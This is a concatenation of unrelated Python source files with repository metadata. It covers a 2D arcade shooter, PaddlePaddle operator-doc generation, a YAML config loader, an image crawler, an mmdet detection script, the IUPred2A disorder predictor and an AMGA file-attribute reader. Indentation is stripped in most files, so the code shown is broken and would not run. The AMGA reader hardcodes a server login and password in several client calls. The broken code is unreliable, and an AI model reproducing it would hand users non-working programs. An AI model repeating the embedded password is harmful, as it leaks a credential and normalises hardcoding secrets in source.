self.updated_level = -1
self.amount_of_enemies = 5
self.speed = SPRITE_SPEED
# Game Sounds
self.newLevel_sound = arcade.load_sound("shooting_game/assets/sounds/newLevel.wav")
self.gun_sound = arcade.load_sound("shooting_game/assets/sounds/shoot.wav")
self.hit_sound = arcade.load_sound("shooting_game/assets/sounds/shoot.wav")
self.death_sound = arcade.load_sound("shooting_game/assets/sounds/deathenemy.wav")
self.playerDeath_sound = arcade.load_sound("shooting_game/assets/sounds/death.wav")
self.gameOver_sound = arcade.load_sound("shooting_game/assets/sounds/gameOver.wav")
self.left_pressed = False
self.right_pressed = False
self.up_pressed = False
self.down_pressed = False
self.width = SCREEN_WIDTH
# Background image will be stored in this variable
self.background = None
def levels(self):
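        # Populate enemy_list for the current level: levels 1-3 spawn only the
        # basic robot, levels 4-5 add a second enemy type, and level 6+ adds the saw.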
while self.good:
if self.window.level >= 0 and self.window.level <= 3:
for i in range(self.amount_of_enemies):
# Create the enemy image
enemy = ENEMY(":resources:images/animated_characters/robot/robot_walk7.png", SPRITE_SCALING_ENEMY, self.enemy_health)
# Position the enemy
enemy.center_x = random.randrange(SCREEN_WIDTH)
enemy.center_y = random.randrange(120, SCREEN_HEIGHT)
# Add the enemy to the lists
self.enemy_list.append(enemy)
                if len(self.enemy_list) == 0:
self.window.level = self.updated_level + 1
arcade.play_sound(self.newLevel_sound)
else:
self.good = False
elif self.window.level > 3 and self.window.level < 6:
for i in range(self.amount_of_enemies):
# Create the enemy image
enemy = ENEMY(":resources:images/animated_characters/robot/robot_walk7.png", SPRITE_SCALING_ENEMY, self.enemy_health)
enemy2 = ENEMY(":resources:images/animated_characters/robot/robot_fall.png", SPRITE_SCALING_ENEMY_2, self.enemy_health2)
# Position the enemy
enemy.center_x = random.randrange(SCREEN_WIDTH)
enemy.center_y = random.randrange(120, SCREEN_HEIGHT)
enemy2.center_x = random.randrange(SCREEN_WIDTH)
enemy2.center_y = random.randrange(120, SCREEN_HEIGHT)
# Add the enemy to the lists
self.enemy_list.append(enemy)
self.enemy_list.append(enemy2)
                if len(self.enemy_list) == 0:
                    self.window.level = self.updated_level + 1
else:
self.good = False
else:
for i in range(self.amount_of_enemies):
# Create the enemy image
enemy = ENEMY(":resources:images/animated_characters/robot/robot_walk7.png", SPRITE_SCALING_ENEMY, self.enemy_health)
enemy2 = ENEMY(":resources:images/animated_characters/robot/robot_fall.png", SPRITE_SCALING_ENEMY_2, self.enemy_health2)
enemy3 = ENEMY(":resources:images/enemies/saw.png", SPRITE_SCALING_ENEMY_3, self.enemy_health3)
# Position the enemy
enemy.center_x = random.randrange(SCREEN_WIDTH)
enemy.center_y = random.randrange(120, SCREEN_HEIGHT)
enemy2.center_x = random.randrange(SCREEN_WIDTH)
enemy2.center_y = random.randrange(120, SCREEN_HEIGHT)
enemy3.center_x = random.randrange(SCREEN_WIDTH)
enemy3.center_y = random.randrange(120, SCREEN_HEIGHT)
# Add the enemy to the lists
self.enemy_list.append(enemy)
self.enemy_list.append(enemy2)
self.enemy_list.append(enemy3)
                if len(self.enemy_list) == 0:
self.window.level = self.updated_level + 1
else:
self.good = False
def setup(self):
# Set up the game
# Sprite lists
self.window.level = 1
self.player_list = arcade.SpriteList()
self.enemy_list = arcade.SpriteList()
self.bullet_list = arcade.SpriteList()
self.player_sprite = PLAYER(":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png", SPRITE_SCALING_PLAYER, player_max_health=10)
self.player_sprite.center_x = 400
self.player_sprite.center_y = 300
self.player_list.append(self.player_sprite)
self.levels()
# Set the background color
self.background = arcade.load_texture(":resources:images/backgrounds/abstract_1.jpg")
def on_key_press(self, key, modifiers):
"""Called whenever a key is pressed. """
if key == arcade.key.UP:
self.up_pressed = True
elif key == arcade.key.DOWN:
self.down_pressed = True
elif key == arcade.key.LEFT:
self.left_pressed = True
elif key == arcade.key.RIGHT:
self.right_pressed = True
def on_key_release(self, key, modifiers):
"""Called when the user releases a key. """
if key == arcade.key.UP:
self.up_pressed = False
elif key == arcade.key.DOWN:
self.down_pressed = False
elif key == arcade.key.LEFT:
self.left_pressed = False
elif key == arcade.key.RIGHT:
self.right_pressed = False
def on_draw(self):
# render the screen befroe start drawing
arcade.start_render()
arcade.draw_lrwh_rectangle_textured(0, 0,
SCREEN_WIDTH, SCREEN_HEIGHT,
self.background)
# Draw all the sprites
self.enemy_list.draw()
self.bullet_list.draw()
self.player_list.draw()
output = f"Level: {self.window.level}"
arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15)
for player in self.player_list:
player.player_draw_health_number()
player.player_draw_health_bar()
for enemy in self.enemy_list:
enemy.enemy_draw_health_number()
enemy.enemy_draw_health_bar()
def on_mouse_press(self, x, y, button, modifiers):
# Called whenever the mouse button is clicked
arcade.play_sound(self.gun_sound)
# Create a bullet
bullet = arcade.Sprite(":resources:images/space_shooter/meteorGrey_small1.png", SPRITE_SCALING_BULLET)
# Position the bullet at the player's current location
start_x = self.player_sprite.center_x
start_y = self.player_sprite.center_y
bullet.center_x = start_x
bullet.center_y = start_y
# Get from the mouse the destination location for the bullet
dest_x = x
dest_y = y
# Do math to calculate how to get the bullet to the destination.
x_diff = dest_x - start_x
y_diff = dest_y - start_y
angle = math.atan2(y_diff, x_diff)
# Taking into account the angle, calculate our change_x
# and change_y. Velocity is how fast the bullet travels.
bullet.change_x = math.cos(angle) * BULLET_SPEED
bullet.change_y = math.sin(angle) * BULLET_SPEED
# Add the bullet to the lists
self.bullet_list.append(bullet)
def on_update(self, delta_time):
""" Movement and game logic """
self.player_sprite.change_x = 0
self.player_sprite.change_y = 0
if self.up_pressed and not self.down_pressed:
self.player_sprite.change_y = MOVEMENT_SPEED
elif self.down_pressed and not self.up_pressed:
self.player_sprite.change_y = -MOVEMENT_SPEED
if self.left_pressed and not self.right_pressed:
self.player_sprite.change_x = -MOVEMENT_SPEED
elif self.right_pressed and not self.left_pressed:
self.player_sprite.change_x = MOVEMENT_SPEED
self.player_list.update()
for enemy in self.enemy_list:
enemy.follow_sprite(self.player_sprite)
for enemy2 in self.enemy_list:
enemy2.follow_sprite(self.player_sprite)
for enemy3 in self.enemy_list:
enemy3.follow_sprite(self.player_sprite)
# update all sprites
self.bullet_list.update()
if len(self.enemy_list) == 0 and self.window.level > self.updated_level:
self.window.level += 1
self.good = True
self.levels()
self.amount_of_enemies += 2
#self.enemy_health += 1
self.speed += .20
arcade.play_sound(self.newLevel_sound)
for enemy in self.enemy_list:
player_hit = arcade.check_for_collision_with_list(enemy, self.player_list)
if len(player_hit) > 0:
enemy.remove_from_sprite_lists()
for player in player_hit:
# Make sure this is the right sprite
if not isinstance(player, PLAYER):
raise TypeError("List contents must be all ints")
# Remove one health point
player.player_cur_health -= 1
# Check health
if player.player_cur_health <= 0:
arcade.play_sound(self.gameOver_sound)
game_over = GameOverView()
self.window.show_view(game_over)
arcade.run()
                        # player is dead, remove the sprite
player.remove_from_sprite_lists()
else:
# Not dead
arcade.play_sound(self.playerDeath_sound)
# Loop through each bullet
for bullet in self.bullet_list:
            # Check this bullet to see if it hit an enemy
hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list)
# If it did, get rid of the bullet
if len(hit_list) > 0:
bullet.remove_from_sprite_lists()
# For every enemy we hit, process
for enemy in hit_list:
# Make sure this is the right sprite
if not isinstance(enemy, ENEMY):
raise TypeError("List contents must be all ints")
# Remove one health point
enemy.enemy_cur_health -= 1
# Check health
if enemy.enemy_cur_health <= 0:
# enemy dead
enemy.remove_from_sprite_lists()
arcade.play_sound(self.death_sound)
else:
# Not dead
arcade.play_sound(self.hit_sound)
# If the bullet flies off-screen, remove it.
            if bullet.bottom > SCREEN_HEIGHT or bullet.top < 0 or bullet.right < 0 or bullet.left > SCREEN_WIDTH:
bullet.remove_from_sprite_lists()
def main():
window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, "Shooter Game")
menu_view = MenuView()
window.show_view(menu_view)
arcade.run()
window.level = 0
# game = MyGame()
# game.setup()
# arcade.run()
if __name__ == "__main__":
main() | 3.078125 | 3 |
portal/portal/legacy/operators.py | sneaxiy/PaddlePaddle.org | 47 | 12796635 | <gh_stars>10-100
import json
import os
import re
import codecs
from bs4 import BeautifulSoup
from django.template import Template, Context
import markdown
from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS
OPERATOR_TEMPLATE = '<div class="section" id="{{ type }}">' + (
'<h2>{{ type }}</h2>') + (
'<dl class="function"><dd>{{ comment|safe }}') + (
'<table class="docutils field-list">') + (
'<colgroup><col class="field-name"><col class="field-body"></colgroup>') + (
'<tbody valign="top">') + (
'<tr class="field-odd field">') + (
'<th class="field-name">Inputs:</th>') + (
'<td class="field-body"><ul class="first simple">{% for input in inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') + (
'</tr>') + (
'<tr class="field-even field"><th class="field-name">Outputs:</th>') + (
'<td class="field-body"><ul class="first simple">{% for output in outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>') + (
'</tr>') + (
'{% if attrs|length_is:"0" %}{% else %}<tr class="field-odd field"><th class="field-name">Attributes:</th>') + (
'<td class="field-body"><ul class="first simple">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>') + (
'</tr>{% endif %}') + (
'</tbody>') + (
'</table></dd>') + (
'</dl>') + (
'</div>')
OPERATORS_WRAPPER = (
'<div class="document">{% verbatim %}<h1>Operators</h1><div class="section" id="operators">',
'</div>{% endverbatim %}</div>'
)
OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json'
def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name):
try:
operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir)
if not os.path.exists(operators_json_path):
raise Exception('operators.json does not exists in %s' % operators_json_path)
generate_operators_page_with_path(operators_json_path, generated_docs_dir)
except Exception, e:
print 'Failed to build operator docs because: ', e
def generate_operators_page_with_path(operators_api_path, destination_dir):
try:
# Open the operators API file.
with open(operators_api_path) as raw_operators_api_file:
raw_operators_api = raw_operators_api_file.read()
generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html'])
except Exception, e:
print 'Failed to build operator docs because: ', e
def generate_operators_page(raw_operators_api, destination_dir, lang_dirs):
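    # Render each operator's metadata through OPERATOR_TEMPLATE, restore any
    # reserved LaTeX formulas, and write the combined operators.html for each language dir.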
operators_output = ''
try:
operators = clean_json_string(raw_operators_api)
# Go through all the operators and construct a new HTML object.
operator_template = Template(OPERATOR_TEMPLATE)
operators_output += OPERATORS_WRAPPER[0]
for operator in operators:
if 'comment' in operator:
formula_map = {}
comment = reserve_formulas(operator['comment'], formula_map,
only_reserve_double_dollar=True)
comment = markdown.markdown(comment,
extensions=MARKDOWN_EXTENSIONS)
#if len(operator_comment_line) > 0:
if 'markdown-equation' in comment:
soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml')
markdown_equation_placeholders = soup.select('.markdown-equation')
for equation in markdown_equation_placeholders:
equation.string = formula_map[equation.get('id')]
comment = unicode(
str(soup.select('body')[0])[6:-7], 'utf-8'
)
operator['comment'] = comment
operators_output += operator_template.render(Context(operator))
operators_output += OPERATORS_WRAPPER[1]
for lang in lang_dirs:
operators_output_path = '%s/%s/operators.html' % (destination_dir, lang)
print 'Saving operators.html to %s' % operators_output_path
if not os.path.exists(os.path.dirname(operators_output_path)):
os.makedirs(os.path.dirname(operators_output_path))
with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file:
operators_output_file.write(operators_output)
except Exception, e:
print 'Failed to build operator docs because: ', e
def clean_json_string(body):
"""
Takes in a string meant to be interpreted as a JSON object, and removes
faulty characters, recursively.
"""
try:
return json.loads(body)
except ValueError, e:
if str(e).startswith('Invalid control character'):
faulty_character_index = int(re.search(
'char (?P<column>\d+)', str(e)).group('column'))
return clean_json_string(
body[:faulty_character_index] + body[faulty_character_index+1:])
| 2.375 | 2 |
mysql2sqlite/config/__init__.py | MFrat/mysql2sqlite | 0 | 12796636 | import yaml
from pkg_resources import resource_stream
def load(filename):
with resource_stream(__name__, filename) as config_file:
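        # NOTE: newer PyYAML releases warn when yaml.load() is called without an
        # explicit Loader argument; yaml.safe_load() is the usual replacement.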
return yaml.load(config_file)
def load_cluster_config(name):
return load('{0}.yml'.format(name))
_env = load('context.yml')
_configs = {}
def get_config(env):
if env not in _configs:
_configs[env] = load_cluster_config(get_cluster_name(env))
_configs[env].update(_env[env].get("override", {}))
return _configs[env]
def get_cluster_name(env):
return _env[env]["cluster"]
| 2.328125 | 2 |
crawl.py | doudounannan/python-crawl | 0 | 12796637 | import requests, urllib, urllib2, os
from bs4 import BeautifulSoup
import style
def getImg(url):
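    # Fetch the page at `url` and print the src attribute of every <img> tag found.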
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
imgs = soup.find_all('img')
for img in imgs:
print(img.get('src'))
def downloadImg(imgUrl, targetUrl):
arr = imgUrl.split('/')
fileName = arr[len(arr) - 1]
if not os.path.exists(targetUrl + fileName):
output = open(targetUrl + fileName, 'wb+')
imgData = urllib2.urlopen(imgUrl).read()
output.write(imgData)
output.close()
print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + ' is downloaded.'
else:
print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple') + ' is here!'
downloadImg('http://posters.imdb.cn/ren-pp/0000701/CjR3AsiaP_1190290948.jpg', '/Users/zhengmeiyu/Downloads/')
getImg('http://22mm.xiuna.com/mm/qingliang/')
| 3.21875 | 3 |
fsc/detect.py | wsx66848/tsd | 4 | 12796638 | <reponame>wsx66848/tsd
import sys
from myutils import my_config
from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result
import os.path as osp
from app import *
debug = False
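# When debug is True, main() only prints the cached standard result from
# load_result() instead of running the detector.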
# only for debug
def load_result():
lines = ""
with open("test_image/standard_result_6411.txt", "r") as f:
lines = f.read()
return lines
def main():
#detection debug
if debug is True:
print(load_result())
return
path = sys.path[0]
# config = path + '/../configs/faster_rcnn_r50_fpn_1x.py'
# checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth'
config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py'
checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth'
model = init_detector(config, checkpoint)
my_config.set('classes', model.CLASSES)
# print(model)
img = path + '/test.jpg'
if(len(sys.argv) > 1) :
img = sys.argv[1]
print(img)
result = inference_detector(model, img)
out_file = osp.splitext(img)[0] + "_result.png"
# show_result_pyplot(img, result, model.CLASSES, score_thr=0.05)
show_result(img, result, model.CLASSES, out_file=out_file)
print("out_file:%s" % out_file)
if __name__ == '__main__':
main()
| 1.765625 | 2 |
bin/iupred2a.py | tomasMasson/baculovirus_phylogenomics | 0 | 12796639 | <gh_stars>0
#!/usr/bin/env python3
import sys
import textwrap
import math
import os
from Bio import SeqIO
def avg(lst):
return sum(lst) / len(lst)
def aa_freq(_seq):
_freq = {}
for _aa in _seq:
if _aa in _freq:
_freq[_aa] += 1
else:
_freq[_aa] = 1
for _aa, _ins in _freq.items():
_freq[_aa] = _ins / len(_seq)
return _freq
def read_matrix(matrix_file):
_mtx = {}
with open(matrix_file, "r") as _fhm:
for _line in _fhm:
if _line.split()[0] in _mtx:
_mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])
else:
_mtx[_line.split()[0]] = {}
_mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])
return _mtx
def read_histo(histo_file):
hist = []
h_min = float("inf")
h_max = -float("inf")
with open(histo_file, "r") as fnh:
for _line in fnh:
if _line.startswith("#"):
continue
if float(_line.split()[1]) < h_min:
h_min = float(_line.split()[1])
if float(_line.split()[1]) > h_max:
h_max = float(_line.split()[1])
hist.append(float(_line.split()[-1]))
h_step = (h_max - h_min) / (len(hist))
return hist, h_min, h_max, h_step
def smooth(energy_list, window):
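    # Sliding-window mean, e.g. smooth([0, 1, 0], 1) -> [0.5, 1/3, 0.5]:
    # each position is averaged with up to `window` neighbours on each side.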
weighted_energy_score = [0] * len(energy_list)
for idx in range(len(energy_list)):
weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)])
return weighted_energy_score
def read_seq(fasta_file):
_seq = ""
with open(fasta_file) as file_handler:
for _line in file_handler:
if _line.startswith(">"):
continue
_seq += _line.strip()
return _seq
def iupred(seq, mode):
if mode == "short":
lc = 1
uc = 25
wc = 10
mtx = read_matrix("{}/data/iupred2_short_energy_matrix".format(PATH))
histo, histo_min, histo_max, histo_step = read_histo("{}/data/short_histogram".format(PATH))
elif mode == 'glob':
lc = 1
uc = 100
wc = 15
mtx = read_matrix("{}/data/iupred2_long_energy_matrix".format(PATH))
histo, histo_min, histo_max, histo_step = read_histo("{}/data/long_histogram".format(PATH))
else:
lc = 1
uc = 100
wc = 10
mtx = read_matrix("{}/data/iupred2_long_energy_matrix".format(PATH))
histo, histo_min, histo_max, histo_step = read_histo("{}/data/long_histogram".format(PATH))
unweighted_energy_score = [0] * len(seq)
weighted_energy_score = [0] * len(seq)
iupred_score = [0] * len(seq)
for idx in range(len(seq)):
freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx + lc + 1:idx + uc + 1])
for aa, freq in freq_dct.items():
try:
unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq
except KeyError:
unweighted_energy_score[idx] += 0
if mode == 'short':
for idx in range(len(seq)):
for idx2 in range(idx - wc, idx + wc + 1):
if idx2 < 0 or idx2 >= len(seq):
weighted_energy_score[idx] += -1.26
else:
weighted_energy_score[idx] += unweighted_energy_score[idx2]
weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1))
else:
weighted_energy_score = smooth(unweighted_energy_score, wc)
glob_text = ""
if mode == 'glob':
gr = []
in_gr = False
beg, end = 0, 0
for idx, val in enumerate(weighted_energy_score):
if in_gr and val <= 0.3:
gr.append({0: beg, 1: end})
in_gr = False
elif in_gr:
end += 1
if val > 0.3 and not in_gr:
beg = idx
end = idx
in_gr = True
if in_gr:
gr.append({0: beg, 1: end})
mgr = []
k = 0
kk = k + 1
if gr:
beg = gr[0][0]
end = gr[0][1]
nr = len(gr)
while k < nr:
if kk < nr and gr[kk][0] - end < 45:
beg = gr[k][0]
end = gr[kk][1]
kk += 1
elif end - beg + 1 < 35:
k += 1
if k < nr:
beg = gr[k][0]
end = gr[k][1]
else:
mgr.append({0: beg, 1: end})
k = kk
kk += 1
if k < nr:
beg = gr[k][0]
end = gr[k][1]
seq = seq.lower()
nr = 0
res = ""
for i in mgr:
res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper()
nr = i[1] + 1
res += seq[nr:]
res = " ".join([res[i:i + 10] for i in range(0, len(res), 10)])
glob_text += "Number of globular domains: {}\n".format(len(mgr))
for n, i in enumerate(mgr):
glob_text += " globular domain {}.\t{}-{}\n".format(n + 1, i[0] + 1, i[1] + 1)
glob_text += "\n".join(textwrap.wrap(res, 70))
for idx, val in enumerate(weighted_energy_score):
if val <= histo_min + 2 * histo_step:
iupred_score[idx] = 1
elif val >= histo_max - 2 * histo_step:
iupred_score[idx] = 0
else:
iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))]
return iupred_score, glob_text
def anchor2(seq, iupred_scores):
local_window_size = 41
iupred_window_size = 30
local_smoothing_window = 5
par_a = 0.0013
par_b = 0.26
par_c = 0.43
iupred_limit = par_c - (par_a / par_b)
mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH))
interface_comp = {}
with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn:
for line in _fn:
interface_comp[line.split()[1]] = float(line.split()[2])
local_energy_score = [0] * len(seq)
interface_energy_score = [0] * len(seq)
energy_gain = [0] * len(seq)
for idx in range(len(seq)):
freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx + 2:idx + local_window_size + 1])
for aa, freq in freq_dct.items():
try:
local_energy_score[idx] += mtx[seq[idx]][aa] * freq
except KeyError:
local_energy_score[idx] += 0
for aa, freq in interface_comp.items():
try:
interface_energy_score[idx] += mtx[seq[idx]][aa] * freq
except KeyError:
interface_energy_score[idx] += 0
energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx]
iupred_scores = smooth(iupred_scores, iupred_window_size)
energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window)
anchor_score = [0] * len(seq)
for idx in range(len(seq)):
sign = 1
if energy_gain[idx] < par_b and iupred_scores[idx] < par_c:
sign = -1
corr = 0
if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0:
corr = (par_a / (iupred_scores[idx] - par_c)) + par_b
anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c)
anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116)))
return anchor_score
PATH = os.path.dirname(os.path.realpath(__file__))
help_msg = """Usage: {} (options) (seqfile) (iupred type)
\tAvailable types: \"long\", \"short\", \"glob\"
Options
\t-d str - Location of data directory (default='./')
\t-a - Enable ANCHOR2 predition\n""".format(sys.argv[0])
if len(sys.argv) < 2:
sys.exit(help_msg)
if not os.path.isfile(sys.argv[-2]):
sys.exit('Input sequence file not found at {}!\n{}'.format(sys.argv[-2], help_msg))
if not os.path.isdir(PATH):
sys.exit('Data directory not found at {}!\n{}'.format(PATH, help_msg))
if '-d' in sys.argv:
PATH = sys.argv[sys.argv.index('-d') + 1]
if not os.path.isdir(os.path.join(PATH, 'data')):
sys.exit('Data directory not found at {}!\n{}'.format(PATH, help_msg))
if sys.argv[-1] not in ['short', 'long', 'glob']:
sys.exit('Wrong iupred2 option {}!\n{}'.format(sys.argv[-1], help_msg))
# Print output message with run parameters
print("""# IUPred2A: context-dependent prediction of protein disorder as a function of redox state and protein binding
# <NAME>, <NAME>, <NAME>
# Nucleic Acids Research 2018;46(W1):W329-W337.
#
# Prediction type: {}
# Prediction output""".format(sys.argv[-1]))
# Add SeqIO parser to support multiple sequences analysis simultaneously
sequences = SeqIO.parse(sys.argv[-2], "fasta")
for sequence in sequences:
# Print individual sequence identifier for posterior parsing
print(f">{sequence.id}")
iupred2_result = iupred(sequence, sys.argv[-1])
if '-a' in sys.argv:
if sys.argv[-1] == 'long':
anchor2_res = anchor2(sequence, iupred2_result[0])
else:
anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0])
if sys.argv[-1] == 'glob':
print(iupred2_result[1])
if '-a' in sys.argv:
print("# POS\tRES\tIUPRED2\tANCHOR2")
else:
print("# POS\tRES\tIUPRED2")
for pos, residue in enumerate(sequence):
print('{}\t{}\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end="")
if '-a' in sys.argv:
print("\t{:.4f}".format(anchor2_res[pos]), end="")
print()
| 2.796875 | 3 |
Badger/DataLoader/AMGA/readAttributes.py | zhangxt-ihep/IHEPDIRAC | 0 | 12796640 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# author: linlei
#for data/all name of file like run_0023454_All_file014_SFO-2.dst
#for data/skim & mc, we use new file naming rule,
#file name like resonance_eventType_streamId_runL_runH_*.dst
import os
import os.path
import ROOT
from ROOT import gROOT
from amga import mdclient,mdinterface
import string
import re
import time
#get number behiend string "exp"
def getNum(expNum):
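    # e.g. getNum('exp20') -> '20'; returns None when no digit is present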
format = re.compile(r"\d+")
res = format.search(expNum)
if res is not None:
return res.group()
#Get expNum and resonance from ExpSearch according runids
def getExpRes(runids):
entries = []
expRes = {}
expNumList = []
resList = []
#print"runids",runids
client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r')
#client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root')
#get all entries under catalog "/BES3/ExpSearch"
client.listEntries('/BES3_test/ExpSearch')
entry = client.getEntry()[0]
while entry:
entries.append(entry)
entry = client.getEntry()[0]
if entries is None:
print "ExpSearch directory is empty, please run createBesDir first"
        return False
for item in entries:
#for each entry,get its attributes in amga
client.getattr(item,['Id','runFrm','runTo','expNum','resonance'])
result = client.getEntry()[1]
# print item
# print result
runfrm = string.atoi(result[1])
runto = string.atoi(result[2])
for runid in runids:
#check all runid whether between runfrm and runto of each entry
#under catalog "/BES3/ExpSearch"
if runfrm<=runid<=runto:
#if this runid between runfrm and runto,and expNum isn't in expNumList
#add this expNum to expNumList
if result[3] not in expNumList:
expNumList.append(result[3])
#resonance of this id isn't in resonance List,add it to resList
if result[4] not in resList:
resList.append(result[4])
#only including one resonance
if len(resList) == 1:
expRes["resonance"] = resList[0]
else:
#has several resonances,may be has something wrong to this file
print "serveral resonance:",resList
return False
#only including one expNum
if len(expNumList) == 1:
expRes["expNum"] = expNumList[0]
else:
#if including several expNums,combine these expNum into mexpN1pN2p...
        expNumList.sort()
str = "m" + expNumList[0]
for expNum in expNumList[1:]:
str = str + "p+" + getNum(expNum)
expRes["expNum"] = str
return expRes
#check whether eventType is stored in eventTypeList in amga
def eventTypeCheck(eventType):
entries = []
client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r')
#client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root')
client.listEntries('/BES3_test/EventTypeList')
entry = client.getEntry()[0]
while entry:
entries.append(entry)
entry = client.getEntry()[0]
for entry in entries:
#get name of each entry
client.getattr(entry,['FILE'])
result = client.getEntry()[1]
#compare eventType with name of each entry
if eventType == result[0]:
return True
return False
#judge format of file
class JudgeFormat(Exception):
def __init__(self, format):
self.format = format
def __str__(self):
return repr("the File's format is not ",self.format)
#type of srcformat is list,it includes many formats
def checkFormat(srcformat,file):
flag = 0
#print "file",file
for format in srcformat:
#if format of file is in srcformat
if file.endswith(format):
flag = 1
return flag
#Before reading information from .root file,we need to use changeFormat
#function to create a .root link for .dst file
def changeFormat(dstfile,rootfile,srcformat=[".dst",".tag"],destformat=[".root"]):
flag = checkFormat(srcformat,dstfile)
if flag==0:
raise JudgeFormat(srcformat)
return
flag = checkFormat(destformat,rootfile)
if flag==0:
raise JudgeFormat(destformat)
return
#if this rootfile has exists,then delete it
if os.path.exists(rootfile):
os.unlink(rootfile)
#create a new rootfile for dstfile
os.symlink(dstfile,rootfile)
return rootfile
#dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst,
#return run_0023474_All_file007_SFO-2
def getLFN(dstfile,format=[".dst",".tag"]):
flag = checkFormat(format,dstfile)
if flag==0:
raise JudgeFormat(format)
return
#split dstfile by "/",then get "lfn.dst"
items=dstfile.split("/")
length=len(items)
filename=items[length-1]
#split "*.dst" by "."
#get lfn
lfn = filename.split('.')[0]
return lfn
#get size of dst file
def getFileSize(dstfile,format = [".dst",".tag"]):
flag = checkFormat(format,dstfile)
if flag==0:
raise JudgeFormat(format)
return
if os.path.exists(dstfile):
#get file's size
return os.path.getsize(dstfile)
#lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH
#lfn like run_0009947_All_file001_SFO-1,get attribute runId
def splitLFN(lfn,type):
result = {}
items = lfn.split("_")
if type == "all":
if items[2] == "All":
runId = string.atoi(items[1])
return runId
else:
result["resonance"] = items[0]
result["eventType"] = items[1]
result["streamId"] = items[2]
result["runL"] = string.atoi(items[3])
result["runH"] = string.atoi(items[4])
return result
#get runIdList from JobOptions
def getRunIdList(jobOptions):
result = {}
runIdList = []
str1=jobOptions[0]
pat = re.compile(r'RunIdList= {-\d+(,-?\d+)+}')
res1 = pat.search(str1)
if res1 is not None:
#get a string like:RunIdList={-10513,0,-10629}
str2 = res1.group()
result["description"] = str2
pat = re.compile(r'-\d+(,-?\d+)+')
list = pat.search(str2)
if list is not None:
#get a string like:-10513,0,-10629
runIds = list.group()
#split runIds according ','
items=runIds.split(',')
#members' style in items is string,we need to change their style to integer
for i in items:
if i!='0':
runid=abs(string.atoi(i))
runIdList.append(runid)
result["runIdList"] = runIdList
return result
#get Boss version, runid, Entry number, JobOptions from root file
def getCommonInfo(rootfile):
commoninfo = {}
gROOT.ProcessLine('gSystem->Load("libRootEventData.so");')
gROOT.ProcessLine('TFile file("%s");'%rootfile)
gROOT.ProcessLine('TTree* tree =(TTree*)file.Get("JobInfoTree");')
gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get("Event");')
gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch("JobInfo");')
gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch("TEvtHeader");')
gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();')
gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();')
gROOT.ProcessLine('branch->SetAddress(&jobInfo);')
gROOT.ProcessLine('branch1->SetAddress(&evtHeader);')
gROOT.ProcessLine('branch->GetEntry(0);')
gROOT.ProcessLine('branch1->GetEntry(0);')
gROOT.ProcessLine('Int_t num=tree1.GetEntries()')
#get Boss Version
commoninfo["bossVer"] = ROOT.jobInfo.getBossVer()
#get RunId
